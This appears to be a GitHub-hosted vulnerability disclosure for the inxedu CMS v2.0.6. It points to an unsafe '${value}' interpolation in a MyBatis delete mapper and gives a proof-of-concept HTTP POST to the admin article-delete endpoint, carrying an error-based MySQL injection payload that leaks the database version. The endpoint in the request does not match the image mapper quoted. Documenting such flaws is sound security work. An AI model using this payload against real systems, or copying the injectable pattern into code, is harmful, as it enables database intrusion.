Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

inxedu through 2018-12-24 has a SQL Injection vulnerability

Vulnerability Type :SQL Injection

Vendor Homepage: https://www.inxedu.com/

Software Link:http://down.admin5.com/jsp/132874.html

Recurring environment:

CMS v2.0.6 JDK 1.8 Tomcat 7 Mysql 5.5 maven 3.6.3 IntelliJ IDEA 2018

Vulnerability Description AND recurrence:

1、the vulnerability code location /inxedu/demo_inxedu_open/src/main/resources/mybatis/inxedu/website/WebsiteImagesMapper.xml

Here use '$', so it is vulnerable to SQL injection.

<!-- 删除广告图片 -->
<delete id="deleteImages" parameterType="java.lang.String">
  DELETE FROM EDU_WEBSITE_IMAGES WHERE IMAGE_ID IN(${value})
</delete>

POST /admin/article/delete HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 174
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/admin/article/showlist
Cookie: JSESSIONID=F36620C2B7BCC31C241FFC3EA9C544FF; inxedulogin_sys_user_=inxedulogin_sys_user_1
Upgrade-Insecure-Requests: 1

articelId=333 AND (SELECT 9875 FROM(SELECT COUNT(*),CONCAT(0x7178766b71,(SELECT (ELT(9875=9875,1))),version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

image-20201207175510503